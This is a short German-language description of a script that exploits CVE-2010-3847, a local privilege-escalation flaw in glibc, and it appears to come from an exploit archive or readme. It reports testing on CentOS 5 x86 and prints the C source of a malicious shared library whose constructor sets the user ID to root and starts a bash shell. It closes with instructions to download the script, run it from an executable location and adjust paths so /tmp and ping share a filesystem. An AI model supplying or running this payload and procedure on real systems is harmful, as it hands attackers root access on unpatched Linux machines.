
Skript zur Ausnutzung von CVE-2010-3847
Soll den Exploit automatisieren, der unter [http://marc.info/?l=full-disclosure&m=128776663124692&w=2] besprochen wird. Getestet auf CentOS 5 x86.
Das DSO, das es ausgibt, wird aus folgendem Code kompiliert:
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
Laden Sie es herunter, legen Sie es an einem ausführbaren Ort ab und führen Sie es aus.
/tmp und der Ort, an dem sich ping befindet, müssen sich auf demselben Dateisystem befinden. Falls nicht, passen Sie die Pfade entsprechend an.